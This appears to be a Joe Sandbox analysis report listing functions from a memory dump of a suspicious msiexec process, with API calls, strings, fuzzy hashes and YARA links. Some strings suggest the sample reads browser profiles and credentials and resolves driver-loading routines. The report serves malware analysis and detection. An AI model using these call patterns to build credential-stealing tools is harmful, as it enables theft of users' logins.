                                                                                                                                                                                                          Non-executed Functions

                                                                                                                                                                                                          Function 004098E2 Relevance: 16.6, APIs: 11, Instructions: 59clipboardmemoryfileCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • EmptyClipboard.USER32 ref: 004098EC
                                                                                                                                                                                                            • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                                                                                                                          • GetFileSize.KERNEL32(00000000,00000000), ref: 00409909
                                                                                                                                                                                                          • GlobalAlloc.KERNEL32(00002000,00000002), ref: 0040991A
                                                                                                                                                                                                          • GlobalLock.KERNEL32(00000000), ref: 00409927
                                                                                                                                                                                                          • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 0040993A
                                                                                                                                                                                                          • GlobalUnlock.KERNEL32(00000000), ref: 0040994C
                                                                                                                                                                                                          • SetClipboardData.USER32(0000000D,00000000), ref: 00409955
                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 0040995D
                                                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 00409969
                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 00409974
                                                                                                                                                                                                          • CloseClipboard.USER32 ref: 0040997D
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: ClipboardFileGlobal$CloseErrorLast$AllocCreateDataEmptyHandleLockReadSizeUnlock
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 3604893535-0
                                                                                                                                                                                                          • Opcode ID: 92cf2ad6ca5c713dde206082ad36a5e7808ef459d862ee33826dd65d962f9f86
                                                                                                                                                                                                          • Instruction ID: b216396755dc4e0bfb1664a9ae46c4c33dbc75b884417c11e98c88a04b476fe2
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 92cf2ad6ca5c713dde206082ad36a5e7808ef459d862ee33826dd65d962f9f86
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3D113D7A540204BBE7105FA6DC4CA9E7B78FB06356F10457AF902E22A1DB748901CB69
                                                                                                                                                                                                          Function 0040987A Relevance: 12.0, APIs: 8, Instructions: 42clipboardmemoryCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • EmptyClipboard.USER32 ref: 00409882
                                                                                                                                                                                                          • wcslen.MSVCRT ref: 0040988F
                                                                                                                                                                                                          • GlobalAlloc.KERNEL32(00002000,00000002,?,?,?,?,00411A1E,-00000210), ref: 0040989F
                                                                                                                                                                                                          • GlobalLock.KERNEL32(00000000), ref: 004098AC
                                                                                                                                                                                                          • memcpy.MSVCRT(00000000,?,00000002,?,?,?,00411A1E,-00000210), ref: 004098B5
                                                                                                                                                                                                          • GlobalUnlock.KERNEL32(00000000), ref: 004098BE
                                                                                                                                                                                                          • SetClipboardData.USER32(0000000D,00000000), ref: 004098C7
                                                                                                                                                                                                          • CloseClipboard.USER32 ref: 004098D7
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: ClipboardGlobal$AllocCloseDataEmptyLockUnlockmemcpywcslen
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 1213725291-0
                                                                                                                                                                                                          • Opcode ID: ef81b411bc32b98b0d58beac2f1626bda71a649682fb6f24e39e44ffb2f3f244
                                                                                                                                                                                                          • Instruction ID: b754b6ca90195c8d8a6f67e3e00c953256c5cf8724ac1a445a604cc17dd28da6
                                                                                                                                                                                                          • Opcode Fuzzy Hash: ef81b411bc32b98b0d58beac2f1626bda71a649682fb6f24e39e44ffb2f3f244
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4AF0967B1402246BD2112FA6AC4DD2B772CFB86B56B05013AF90592251DA3448004779
                                                                                                                                                                                                          Function 004182CE Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 69windowCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 004182D7
                                                                                                                                                                                                            • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                                                                                                                                                          • FormatMessageW.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 004182FE
                                                                                                                                                                                                          • FormatMessageA.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 00418327
                                                                                                                                                                                                          • LocalFree.KERNEL32(?), ref: 00418342
                                                                                                                                                                                                          • free.MSVCRT ref: 00418370
                                                                                                                                                                                                            • Part of subcall function 00417434: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,7507DF80,?,0041755F,?), ref: 00417452
                                                                                                                                                                                                            • Part of subcall function 00417434: malloc.MSVCRT ref: 00417459
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: FormatMessage$ByteCharErrorFreeLastLocalMultiVersionWidefreemalloc
                                                                                                                                                                                                          • String ID: OsError 0x%x (%u)
                                                                                                                                                                                                          • API String ID: 2360000266-2664311388
                                                                                                                                                                                                          • Opcode ID: 78d2135784b36f3903f9871ee7adf38e4db2590f8e5e3f290b233798c2ec08b4
                                                                                                                                                                                                          • Instruction ID: 20f22e5b187e4483f2e635e74e626e0383ca95cf640bb4168ff376264581b0c9
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 78d2135784b36f3903f9871ee7adf38e4db2590f8e5e3f290b233798c2ec08b4
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6011B634901128FBCB11ABE2DC49CDF7F78FF85B54B10405AF811A2251DB754A81D7A9
                                                                                                                                                                                                          Function 00402279 Relevance: 110.5, APIs: 9, Strings: 54, Instructions: 285COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • _wcsicmp.MSVCRT ref: 004022A6
                                                                                                                                                                                                          • _wcsicmp.MSVCRT ref: 004022D7
                                                                                                                                                                                                          • _wcsicmp.MSVCRT ref: 00402305
                                                                                                                                                                                                          • _wcsicmp.MSVCRT ref: 00402333
                                                                                                                                                                                                            • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                                                                                                                                                                                                            • Part of subcall function 0040AA29: memcpy.MSVCRT(?,?,00000000,00000001,00401B3C,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040AA5B
                                                                                                                                                                                                          • memset.MSVCRT ref: 0040265F
                                                                                                                                                                                                          • memcpy.MSVCRT(?,?,00000011), ref: 0040269B
                                                                                                                                                                                                            • Part of subcall function 00404423: GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                                                                                                                                                                                            • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                                                                                                                                                                          • memcpy.MSVCRT(?,?,0000001C,?,?,00000000,?), ref: 004026FF
                                                                                                                                                                                                          • LocalFree.KERNEL32(?,?,?,00000000,?,?,00000000,?), ref: 00402764
                                                                                                                                                                                                          • FreeLibrary.KERNEL32(00000000,?,?,00000000,?), ref: 00402775
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: _wcsicmp$Freememcpy$Library$AddressLocalProcmemsetwcslen
                                                                                                                                                                                                          • String ID: !$#$$$&$&$'$)$/$0$2$8$=$>$>$@$A$Account$Data$F$H$H$I$K$K$L$O$Path$S$X$\$^$`$a$b$com.apple.Safari$com.apple.WebKit2WebProcess$g$h$n$n$q$server$t$t$t$u$u$w$y$y$z${$}$~
                                                                                                                                                                                                          • API String ID: 577499730-1134094380
                                                                                                                                                                                                          • Opcode ID: dd22fc70d251945153f84157bbedf09d5f9a0a96f25b2184ec3973dd1390e5a3
                                                                                                                                                                                                          • Instruction ID: 24bcbd005531c38afe4d7004bd238553ea51a424b60caac2517de9c8923e7683
                                                                                                                                                                                                          • Opcode Fuzzy Hash: dd22fc70d251945153f84157bbedf09d5f9a0a96f25b2184ec3973dd1390e5a3
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8FE1F32010C7C19DD332D678884978BBFD45BA7328F484B9EF1E89A2D2D7B98509C767
                                                                                                                                                                                                          Function 0040C87B Relevance: 54.5, APIs: 27, Strings: 4, Instructions: 285stringCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: _wcsicmpmemset$_wcsnicmpwcslen$ByteCharMultiWidewcschrwcscpy$memcpystrchrstrlen
                                                                                                                                                                                                          • String ID: :stringdata$ftp://$http://$https://
                                                                                                                                                                                                          • API String ID: 2787044678-1921111777
                                                                                                                                                                                                          • Opcode ID: 5cfdb451540a99f12352c14b787623eda213fcfbf47060a2a7a9031bc80669e4
                                                                                                                                                                                                          • Instruction ID: 1dd8f84a331a8d1f0195812dc1f06ff326a48265e58e3ad24d859c5fcdf3acb9
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5cfdb451540a99f12352c14b787623eda213fcfbf47060a2a7a9031bc80669e4
                                                                                                                                                                                                          • Instruction Fuzzy Hash: C191C571540219AEEF10EF65DC82EEF776DEF41318F01016AF948B7181EA38ED518BA9
                                                                                                                                                                                                          Function 00414002 Relevance: 49.3, APIs: 25, Strings: 3, Instructions: 265COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • GetDlgItem.USER32(?,000003E9), ref: 0041402F
                                                                                                                                                                                                          • GetDlgItem.USER32(?,000003E8), ref: 0041403B
                                                                                                                                                                                                          • GetWindowLongW.USER32(00000000,000000F0), ref: 0041404A
                                                                                                                                                                                                          • GetWindowLongW.USER32(?,000000F0), ref: 00414056
                                                                                                                                                                                                          • GetWindowLongW.USER32(00000000,000000EC), ref: 0041405F
                                                                                                                                                                                                          • GetWindowLongW.USER32(?,000000EC), ref: 0041406B
                                                                                                                                                                                                          • GetWindowRect.USER32(00000000,?), ref: 0041407D
                                                                                                                                                                                                          • GetWindowRect.USER32(?,?), ref: 00414088
                                                                                                                                                                                                          • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0041409C
                                                                                                                                                                                                          • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004140AA
                                                                                                                                                                                                          • GetDC.USER32 ref: 004140E3
                                                                                                                                                                                                          • wcslen.MSVCRT ref: 00414123
                                                                                                                                                                                                          • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 00414134
                                                                                                                                                                                                          • ReleaseDC.USER32(?,?), ref: 00414181
                                                                                                                                                                                                          • _snwprintf.MSVCRT ref: 00414244
                                                                                                                                                                                                          • SetWindowTextW.USER32(?,?), ref: 00414258
                                                                                                                                                                                                          • SetWindowTextW.USER32(?,00000000), ref: 00414276
                                                                                                                                                                                                          • GetDlgItem.USER32(?,00000001), ref: 004142AC
                                                                                                                                                                                                          • GetWindowRect.USER32(00000000,?), ref: 004142BC
                                                                                                                                                                                                          • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004142CA
                                                                                                                                                                                                          • GetClientRect.USER32(?,?), ref: 004142E1
                                                                                                                                                                                                          • GetWindowRect.USER32(?,?), ref: 004142EB
                                                                                                                                                                                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000206), ref: 00414331
                                                                                                                                                                                                          • GetClientRect.USER32(?,?), ref: 0041433B
                                                                                                                                                                                                          • SetWindowPos.USER32(?,00000000,?,?,?,?,00000204), ref: 00414373
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Release_snwprintfwcslen
                                                                                                                                                                                                          • String ID: %s:$EDIT$STATIC
                                                                                                                                                                                                          • API String ID: 2080319088-3046471546
                                                                                                                                                                                                          • Opcode ID: 4cffa952f3a039c60e8efdb869f217de44d75a47fa5f06f0d0d0713d1b76c38a
                                                                                                                                                                                                          • Instruction ID: eff71af8639f47ea0b7533f6321954d8b94ad3b67000e3ed03306cc56154d199
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4cffa952f3a039c60e8efdb869f217de44d75a47fa5f06f0d0d0713d1b76c38a
                                                                                                                                                                                                          • Instruction Fuzzy Hash: F8B1DF71108301AFD721DFA9C985E6BBBF9FF88704F004A2DF69582261DB75E9448F16
                                                                                                                                                                                                          Function 004131DC Relevance: 42.2, APIs: 22, Strings: 2, Instructions: 214windowCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • EndDialog.USER32(?,?), ref: 00413221
                                                                                                                                                                                                          • GetDlgItem.USER32(?,000003EA), ref: 00413239
                                                                                                                                                                                                          • SendMessageW.USER32(00000000,000000B1,00000000,0000FFFF), ref: 00413257
                                                                                                                                                                                                          • SendMessageW.USER32(?,00000301,00000000,00000000), ref: 00413263
                                                                                                                                                                                                          • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 0041326B
                                                                                                                                                                                                          • memset.MSVCRT ref: 00413292
                                                                                                                                                                                                          • memset.MSVCRT ref: 004132B4
                                                                                                                                                                                                          • memset.MSVCRT ref: 004132CD
                                                                                                                                                                                                          • memset.MSVCRT ref: 004132E1
                                                                                                                                                                                                          • memset.MSVCRT ref: 004132FB
                                                                                                                                                                                                          • memset.MSVCRT ref: 00413310
                                                                                                                                                                                                          • GetCurrentProcess.KERNEL32 ref: 00413318
                                                                                                                                                                                                          • ReadProcessMemory.KERNEL32(00000000,?,00000080,00000000), ref: 0041333B
                                                                                                                                                                                                          • ReadProcessMemory.KERNEL32(?,?,00000080,00000000), ref: 0041336D
                                                                                                                                                                                                          • memset.MSVCRT ref: 004133C0
                                                                                                                                                                                                          • GetCurrentProcessId.KERNEL32 ref: 004133CE
                                                                                                                                                                                                          • memcpy.MSVCRT(?,0045AA90,0000021C), ref: 004133FC
                                                                                                                                                                                                          • wcscpy.MSVCRT ref: 0041341F
                                                                                                                                                                                                          • _snwprintf.MSVCRT ref: 0041348E
                                                                                                                                                                                                          • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004134A6
                                                                                                                                                                                                          • GetDlgItem.USER32(?,000003EA), ref: 004134B0
                                                                                                                                                                                                          • SetFocus.USER32(00000000), ref: 004134B7
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          • {Unknown}, xrefs: 004132A6
                                                                                                                                                                                                          • Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X, xrefs: 00413483
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: memset$Process$ItemMessageSend$CurrentMemoryRead$DialogFocusText_snwprintfmemcpywcscpy
                                                                                                                                                                                                          • String ID: Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X${Unknown}
                                                                                                                                                                                                          • API String ID: 4111938811-1819279800
                                                                                                                                                                                                          • Opcode ID: 97bbb4bd5fc40a2980dfba304632497cbec8fb91d9ab00b7ac9f2109681e0e22
                                                                                                                                                                                                          • Instruction ID: fb691a4f2f0ee0f23db40d54bf7b3fb7beca904c55697b54c7815e943e903c38
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 97bbb4bd5fc40a2980dfba304632497cbec8fb91d9ab00b7ac9f2109681e0e22
                                                                                                                                                                                                          • Instruction Fuzzy Hash: A97182B280021DBFEB219F51DC45EEA3B7CFB08355F0440B6F508A6161DB799E948F69
                                                                                                                                                                                                          Function 00401198 Relevance: 39.2, APIs: 26, Instructions: 185COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • GetDlgItem.USER32(?,000003EC), ref: 004011F0
                                                                                                                                                                                                          • ChildWindowFromPoint.USER32(?,?,?), ref: 00401202
                                                                                                                                                                                                          • GetDlgItem.USER32(?,000003EE), ref: 00401238
                                                                                                                                                                                                          • ChildWindowFromPoint.USER32(?,?,?), ref: 00401245
                                                                                                                                                                                                          • GetDlgItem.USER32(?,000003EC), ref: 00401273
                                                                                                                                                                                                          • ChildWindowFromPoint.USER32(?,?,?), ref: 00401285
                                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000,?,?), ref: 0040128E
                                                                                                                                                                                                          • LoadCursorW.USER32(00000000,00000067), ref: 00401297
                                                                                                                                                                                                          • SetCursor.USER32(00000000,?,?), ref: 0040129E
                                                                                                                                                                                                          • GetDlgItem.USER32(?,000003EE), ref: 004012BF
                                                                                                                                                                                                          • ChildWindowFromPoint.USER32(?,?,?), ref: 004012CC
                                                                                                                                                                                                          • GetDlgItem.USER32(?,000003EC), ref: 004012E6
                                                                                                                                                                                                          • SetBkMode.GDI32(?,00000001), ref: 004012F2
                                                                                                                                                                                                          • SetTextColor.GDI32(?,00C00000), ref: 00401300
                                                                                                                                                                                                          • GetSysColorBrush.USER32(0000000F), ref: 00401308
                                                                                                                                                                                                          • GetDlgItem.USER32(?,000003EE), ref: 00401329
                                                                                                                                                                                                          • EndDialog.USER32(?,?), ref: 0040135E
                                                                                                                                                                                                          • DeleteObject.GDI32(?), ref: 0040136A
                                                                                                                                                                                                          • GetDlgItem.USER32(?,000003ED), ref: 0040138F
                                                                                                                                                                                                          • ShowWindow.USER32(00000000), ref: 00401398
                                                                                                                                                                                                          • GetDlgItem.USER32(?,000003EE), ref: 004013A4
                                                                                                                                                                                                          • ShowWindow.USER32(00000000), ref: 004013A7
                                                                                                                                                                                                          • SetDlgItemTextW.USER32(?,000003EE,0045D778), ref: 004013B8
                                                                                                                                                                                                          • SetWindowTextW.USER32(?,00000000), ref: 004013CA
                                                                                                                                                                                                          • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004013E2
                                                                                                                                                                                                          • SetDlgItemTextW.USER32(?,000003EC,?), ref: 004013F3
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogHandleLoadModeModuleObject
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 829165378-0
                                                                                                                                                                                                          • Opcode ID: 19a332b7149b8c9d9d3d6ff7d6a76f82ec59d5834f8b717de0dd62f1513d673f
                                                                                                                                                                                                          • Instruction ID: caa3714a391556dce09a7e5fb0b25e31ef738818e6d8753142f97b5ec5ee2caf
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 19a332b7149b8c9d9d3d6ff7d6a76f82ec59d5834f8b717de0dd62f1513d673f
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0051B134500708AFEB32AF61DC85E6E7BB9FB44301F10093AF552A61F1C7B9A991DB19
                                                                                                                                                                                                          Function 0040414F Relevance: 35.1, APIs: 13, Strings: 7, Instructions: 145COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • memset.MSVCRT ref: 00404172
                                                                                                                                                                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                                                            • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                                                            • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                                                            • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                                                                                          • wcscpy.MSVCRT ref: 004041D6
                                                                                                                                                                                                          • wcscpy.MSVCRT ref: 004041E7
                                                                                                                                                                                                          • memset.MSVCRT ref: 00404200
                                                                                                                                                                                                          • memset.MSVCRT ref: 00404215
                                                                                                                                                                                                          • _snwprintf.MSVCRT ref: 0040422F
                                                                                                                                                                                                          • wcscpy.MSVCRT ref: 00404242
                                                                                                                                                                                                          • memset.MSVCRT ref: 0040426E
                                                                                                                                                                                                          • memset.MSVCRT ref: 004042CD
                                                                                                                                                                                                          • memset.MSVCRT ref: 004042E2
                                                                                                                                                                                                          • _snwprintf.MSVCRT ref: 004042FE
                                                                                                                                                                                                          • wcscpy.MSVCRT ref: 00404311
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: memset$wcscpy$_snwprintfwcslen$AttributesFilewcscat
                                                                                                                                                                                                          • String ID: AE$General$IsRelative$Path$Profile%d$profiles.ini$EA
                                                                                                                                                                                                          • API String ID: 2454223109-1580313836
                                                                                                                                                                                                          • Opcode ID: 14b0d88d68d2695e792434069e0167c5559d7d25d781ac3d9655dfb0e2d65502
                                                                                                                                                                                                          • Instruction ID: 5f54f20862f9259acc4f568515dc65a5c395277ecd0331c6beb9e3a358a2eb32
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 14b0d88d68d2695e792434069e0167c5559d7d25d781ac3d9655dfb0e2d65502
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 18512FB294012CBADB20EB55DC45ECFB7BCBF55744F0040E6B50CA2142EA795B84CFAA
                                                                                                                                                                                                          Function 00411346 Relevance: 31.8, APIs: 13, Strings: 5, Instructions: 263windowregistryclipboardCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 0040D407: LoadMenuW.USER32(00000000), ref: 0040D40F
                                                                                                                                                                                                          • SetMenu.USER32(?,00000000), ref: 00411453
                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000404,00000001,?), ref: 00411486
                                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 00411495
                                                                                                                                                                                                          • LoadImageW.USER32(00000000,00000068,00000000,00000000,00000000,00009060), ref: 004114A2
                                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 004114D9
                                                                                                                                                                                                          • CreateWindowExW.USER32(00000000,SysListView32,00000000,50810809,00000000,00000000,00000190,000000C8,?,00000103,00000000,00000000), ref: 00411500
                                                                                                                                                                                                          • memcpy.MSVCRT(?,?,00002008,/nosaveload,00000000,00000001), ref: 004115C8
                                                                                                                                                                                                          • ShowWindow.USER32(?,?), ref: 004115FE
                                                                                                                                                                                                          • GetFileAttributesW.KERNEL32(0045E078), ref: 0041162F
                                                                                                                                                                                                          • GetTempPathW.KERNEL32(00000104,0045E078), ref: 0041163F
                                                                                                                                                                                                          • RegisterClipboardFormatW.USER32(commdlg_FindReplace), ref: 0041167A
                                                                                                                                                                                                          • SendMessageW.USER32(?,00000404,00000002,?), ref: 004116B4
                                                                                                                                                                                                          • SendMessageW.USER32(?,0000040B,00001001,00000000), ref: 004116C7
                                                                                                                                                                                                            • Part of subcall function 00404592: wcslen.MSVCRT ref: 004045AF
                                                                                                                                                                                                            • Part of subcall function 00404592: SendMessageW.USER32(?,00001061,?,?), ref: 004045D3
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: MessageSend$HandleLoadMenuModuleWindow$AttributesClipboardCreateFileFormatImagePathRegisterShowTempmemcpywcslen
                                                                                                                                                                                                          • String ID: /nosaveload$SysListView32$commdlg_FindReplace$report.html$xE
                                                                                                                                                                                                          • API String ID: 4054529287-3175352466
                                                                                                                                                                                                          • Opcode ID: 80e2c4da556a6dfda94225f517483429c905b521daebd2f44f7cad3fe39d77d4
                                                                                                                                                                                                          • Instruction ID: 800f7bfcdfcb1fd3e7c20450dd8eb4425a557a8a4e928c852398501c1500280f
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 80e2c4da556a6dfda94225f517483429c905b521daebd2f44f7cad3fe39d77d4
                                                                                                                                                                                                          • Instruction Fuzzy Hash: CBA1A271640388AFEB11DF69CC89FCA3FA5AF55304F0404B9FE48AF292C6B59548CB65
                                                                                                                                                                                                          Function 0041352F Relevance: 31.5, APIs: 9, Strings: 9, Instructions: 41libraryloaderCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00413559
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(NtLoadDriver), ref: 0041356B
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(NtUnloadDriver), ref: 0041357D
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 0041358F
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 004135A1
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(NtQueryObject), ref: 004135B3
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(NtSuspendProcess), ref: 004135C5
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(NtResumeProcess), ref: 004135D7
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: AddressProc$HandleModule
                                                                                                                                                                                                          • String ID: NtLoadDriver$NtOpenSymbolicLinkObject$NtQueryObject$NtQuerySymbolicLinkObject$NtQuerySystemInformation$NtResumeProcess$NtSuspendProcess$NtUnloadDriver$ntdll.dll
                                                                                                                                                                                                          • API String ID: 667068680-2887671607
                                                                                                                                                                                                          • Opcode ID: 57b3ef5f97466978e1990f74adf29af07ff290b7ce4571feabf87054e0031f76
                                                                                                                                                                                                          • Instruction ID: 8dd6b0f06cc06780b82abcfa5335c49c30c65db347d43124f897848efd9f6b7c
